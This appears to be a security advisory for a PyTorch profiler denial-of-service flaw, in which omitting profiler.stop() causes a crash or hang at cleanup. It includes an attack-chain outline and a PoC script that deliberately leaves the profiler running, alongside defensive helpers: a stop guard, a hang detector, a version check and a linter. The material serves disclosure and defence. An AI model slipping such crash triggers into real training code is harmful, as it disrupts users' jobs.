CVE-2025-63396: PyTorch profiler denial-of-service vulnerability

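Vulnerability information

CVE ID: CVE-2025-63396
Vulnerability type: Denial of service
CVSS score: 3.3 (Low)
Attack vector: Local (AV:L)
Privileges required: Low (PR:L)
User interaction: None (UI:N)
Affected product: PyTorch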

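Overview

CVE-2025-63396 is a denial-of-service vulnerability in the PyTorch deep learning framework. It affects PyTorch v2.5 and v2.7.1 and arises when torch.profiler.profile is used for profiling and the developer omits the call to profiler.stop(). When the PythonTracer destroys the profiler object during finalization, the program can crash or hang indefinitely, resulting in a denial of service (DoS). The issue can be triggered locally with low privileges and requires no user interaction. The CVSS score is 3.3 (Low), and the impact is limited to availability. The issue has been reported to the PyTorch project together with a suggested fix.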

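Technical details

The vulnerability is in PyTorch's profiling module. torch.profiler.profile is PyTorch's profiling tool for collecting and analyzing performance data during model training. When the PythonTracer (the Python tracer) is in use and the developer never explicitly calls profiler.stop(), the cleanup logic in the destructor runs when the profiler object is garbage-collected or the program exits. Because the profiler was never stopped, PythonTracer may, during finalization, access resources that have already been released or enter a deadlock. This can lead to: (1) a crash during destruction; (2) an indefinite hang during cleanup, so the process cannot exit normally; (3) memory problems from releasing resources that were not properly managed. To trigger the issue, an attacker only needs to create, in a local environment, a profiling script that uses the profiler without stopping it correctly. This is especially dangerous for long-running training jobs and for production environments that start and stop profiling frequently.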
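The failure described above is a lifecycle mismatch: start() without a matching stop(). The following is a minimal sketch of a guard that makes stop() idempotent and also registers it with atexit, so that it runs at normal interpreter exit if the caller forgets. StopGuard and FakeProfiler are hypothetical names introduced for illustration. The guard relies only on the wrapped object exposing start() and stop(), as torch.profiler.profile does. Whether stopping at exit fully avoids the crash on affected versions is an assumption based on the description above and has not been verified here.

```python
import atexit


class StopGuard:
    """Wrap any object exposing start()/stop() so that stop() runs at most once."""

    def __init__(self, profiler):
        self._profiler = profiler
        self._running = False
        # Safety net: runs at normal interpreter exit, before module teardown.
        # It is a no-op if stop() has already been called.
        atexit.register(self.stop)

    def start(self):
        if not self._running:
            self._profiler.start()
            self._running = True

    def stop(self):
        if self._running:
            self._running = False  # cleared first so a failing stop() is not retried
            self._profiler.stop()

    def __enter__(self):
        self.start()
        return self._profiler

    def __exit__(self, exc_type, exc, tb):
        self.stop()
        return False  # never swallow exceptions from the profiled code


class FakeProfiler:
    """Stand-in used only to demonstrate the call order without PyTorch."""

    def __init__(self):
        self.calls = []

    def start(self):
        self.calls.append("start")

    def stop(self):
        self.calls.append("stop")


fake = FakeProfiler()
guard = StopGuard(fake)
guard.start()
guard.stop()
guard.stop()  # second call is ignored
print(fake.calls)  # ['start', 'stop']
```

With PyTorch installed, the same guard could wrap a real profiler, for example StopGuard(torch.profiler.profile(with_stack=True)). Note that the atexit registration keeps the guard, and therefore the profiler, alive until interpreter exit. The atexit hook does not run if the process is killed by a signal or exits through os._exit().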

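Attack chain analysis

Step 1

The attacker obtains PyTorch v2.5 or v2.7.1 in a local environment.

Step 2

The attacker writes a Python script that uses torch.profiler.profile for profiling.

Step 3

The script deliberately omits the profiler.stop() call once profiling is done.

Step 4

When PythonTracer finalizes the profiler object, a crash or hang is triggered.

Step 5

The deep learning training process crashes or waits indefinitely, resulting in denial of service.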
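Steps 4 and 5 happen while the process is tearing down, so they are easiest to observe from outside the process. The sketch below runs a command in a child process and classifies the outcome as a clean exit, an error exit, a crash, or a hang. classify_run is a hypothetical helper name, and the 10-second default timeout is an arbitrary assumption.

```python
import subprocess
import sys


def classify_run(argv, timeout_s=10.0):
    """Run argv in a child process and return 'ok', 'error', 'crash', or 'hang'."""
    try:
        # On timeout, subprocess.run kills the child and raises TimeoutExpired.
        proc = subprocess.run(argv, capture_output=True, timeout=timeout_s)
    except subprocess.TimeoutExpired:
        return "hang"
    if proc.returncode == 0:
        return "ok"
    # On POSIX a negative return code means the child was killed by a signal
    # (for example -11 for SIGSEGV). Windows reports crashes differently.
    return "crash" if proc.returncode < 0 else "error"


print(classify_run([sys.executable, "-c", "pass"]))  # prints "ok"
```

To check a candidate script, pass its path instead of the inline command, for example classify_run([sys.executable, "poc.py"]), where poc.py is a placeholder file name.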

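PoC / Exploit code

⚠️ For security research only

The following code is intended solely for security research and authorized testing. Unauthorized use is illegal.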

#!/usr/bin/env python3
"""
CVE-2025-63396 PoC - PyTorch profiler DoS
Description: Omission of profiler.stop() causes torch.profiler.profile 
             (PythonTracer) to crash or hang during finalization
Author: Security Researcher
Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-63396
"""

import signal
import sys

import torch
import torch.profiler


def trigger_vulnerability():
    """
    Start a profiler with Python stack tracing and never call stop().
    """
    print(f"[+] PyTorch version: {torch.__version__}")
    print("[+] Triggering CVE-2025-63396 vulnerability...")

    # Only request CUDA activity when a GPU is actually present.
    activities = [torch.profiler.ProfilerActivity.CPU]
    if torch.cuda.is_available():
        activities.append(torch.profiler.ProfilerActivity.CUDA)

    try:
        # Deliberately NOT a `with` block: the context manager calls stop()
        # on exit, which would hide the bug. No schedule is passed either,
        # so recording stays active from start() until stop() is called.
        # with_stack=True enables the Python tracer.
        prof = torch.profiler.profile(
            activities=activities,
            record_shapes=True,
            profile_memory=True,
            with_stack=True,
        )
        prof.start()

        # Perform some computation while the profiler is recording
        model = torch.nn.Linear(100, 100)
        optimizer = torch.optim.SGD(model.parameters(), lr=0.01)

        for step in range(5):
            # Simulate a training step
            data = torch.randn(32, 100)
            target = torch.randn(32, 100)

            output = model(data)
            loss = torch.nn.functional.mse_loss(output, target)

            optimizer.zero_grad()
            loss.backward()
            optimizer.step()

        # BUG under test: prof.stop() is never called.
        print("[-] WARNING: profiler.stop() was not called!")
        print("[-] Profiler may crash/hang during cleanup...")

    except Exception as e:
        print(f"[!] Exception caught: {e}")
        return False

    # When this function returns, the profiler object becomes unreachable
    # and is finalized without having been stopped.
    print("[+] Function completed, cleanup will occur...")
    return True


def main():
    print("=" * 60)
    print("CVE-2025-63396 - PyTorch Profiler DoS Vulnerability PoC")
    print("=" * 60)

    # Check PyTorch version
    version = torch.__version__
    print(f"[*] PyTorch Version: {version}")

    # Affected versions per the advisory: v2.5 and v2.7.1. Compare the
    # release part only; a substring test would also match e.g. "12.5.0".
    release = version.split("+")[0]
    is_affected = release == "2.7.1" or release.startswith("2.5.")

    if is_affected:
        print(f"[!] This PyTorch version ({version}) is listed as affected")
    else:
        print(f"[*] This PyTorch version ({version}) may not be affected")

    print("\n[*] Executing vulnerable code...")
    print("[*] Expected behavior: Crash or hang during cleanup\n")

    # Watchdog (POSIX only): SIGALRM keeps its default action, which
    # terminates the process, so a hang inside native cleanup code or at
    # interpreter exit is still cut off after 10 seconds. A Python-level
    # handler may never run in that situation, and the alarm is
    # intentionally not cancelled.
    signal.signal(signal.SIGALRM, signal.SIG_DFL)
    signal.alarm(10)

    try:
        trigger_vulnerability()
        print("\n[+] Script body completed - a crash or hang may still occur at exit")
    except KeyboardInterrupt:
        print("\n[!] Interrupted by user")
        sys.exit(130)


if __name__ == "__main__":
    main()

Affected versions

PyTorch 2.5

PyTorch 2.7.1
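A deployment can compare its installed version against the two entries above. The sketch below parses the numeric release part of a version string such as torch.__version__ and matches it by prefix. Treating "2.5" as "any 2.5.x release" is an assumption, since the advisory does not state patch-level granularity. release_tuple and is_listed_version are hypothetical helper names.

```python
import re

# Versions named in the advisory. Reading "2.5" as "any 2.5.x" is an assumption.
AFFECTED_PREFIXES = ((2, 5), (2, 7, 1))


def release_tuple(version):
    """Extract the numeric release part, e.g. '2.7.1+cu126' -> (2, 7, 1)."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return tuple(int(part) for part in match.group().split("."))


def is_listed_version(version):
    """Return True if the version matches one of the advisory's entries."""
    release = release_tuple(version)
    return any(release[:len(prefix)] == prefix for prefix in AFFECTED_PREFIXES)


for candidate in ("2.5.1+cu121", "2.7.1", "2.7.0", "12.5.0"):
    print(candidate, is_listed_version(candidate))
```

Comparing integer tuples avoids the false positives of a substring test, which would report "12.5.0" as a match for "2.5".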

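Defense guide

Temporary mitigations

Always use a with statement or an explicit profiler.stop() call so that the profiler is shut down correctly. For existing code, add checks that every use of torch.profiler.profile is paired with a corresponding stop() call, or use the context manager to handle the lifecycle automatically. Until an upgrade to a fixed version is possible, the profiler can be temporarily disabled or run in an isolated environment.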
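The check for paired stop() calls can be partly automated. The following is a rough sketch that uses Python's ast module to flag variables assigned from a call named profile on which start() is called but stop() never is. find_unstopped_profilers is a hypothetical helper, and the heuristic is an assumption rather than a complete analysis: it looks at one source file, ignores control flow, and does not follow aliases or attributes.

```python
import ast


def _dotted_name(node):
    """Return 'a.b.c' for Name/Attribute chains, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def find_unstopped_profilers(source):
    """Return sorted variable names that are started but never stopped."""
    profilers, started, stopped = set(), set(), set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Assign) and isinstance(node.value, ast.Call):
            # Matches `x = profile(...)` and `x = torch.profiler.profile(...)`.
            callee = _dotted_name(node.value.func) or ""
            if callee == "profile" or callee.endswith(".profile"):
                for target in node.targets:
                    if isinstance(target, ast.Name):
                        profilers.add(target.id)
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
            owner = _dotted_name(node.func.value)
            if node.func.attr == "start":
                started.add(owner)
            elif node.func.attr == "stop":
                stopped.add(owner)
    return sorted((profilers & started) - stopped)


risky = (
    "import torch\n"
    "prof = torch.profiler.profile(with_stack=True)\n"
    "prof.start()\n"
)
print(find_unstopped_profilers(risky))  # ['prof']
```

Profilers used through a with block are not reported, because they are never assigned and started manually. A stop() call that exists but is only reached on some code paths is not detected, so a clean result does not prove that the code is safe.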

References

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-63396
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-63396
3 Details https://www.cvedetails.com/cve/CVE-2025-63396/
4 VulDB https://vuldb.com/cve/CVE-2025-63396
5 Link http://pytorch.com
6 Link https://github.com/Daisy2ang
7 Link https://github.com/pytorch/pytorch
8 Link https://github.com/pytorch/pytorch/issues/156563